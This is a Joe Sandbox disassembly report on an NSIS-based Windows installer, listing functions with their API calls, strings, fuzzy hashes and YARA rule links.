Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Inst, xrefs: 00403698
soft, xrefs: 004036A1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Null, xrefs: 004036AA
Error launching installer, xrefs: 00403603

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00424579,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

pAB, xrefs: 004033AB
yEB, xrefs: 0040346F, 0040348A, 00403513
(]C, xrefs: 004033FD
... %d%%, xrefs: 004034C8

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$yEB
API String ID: 651206458-486274953
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
open, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$open
API String ID: 1459762280-1711415406
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
open, xrefs: 00402770

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

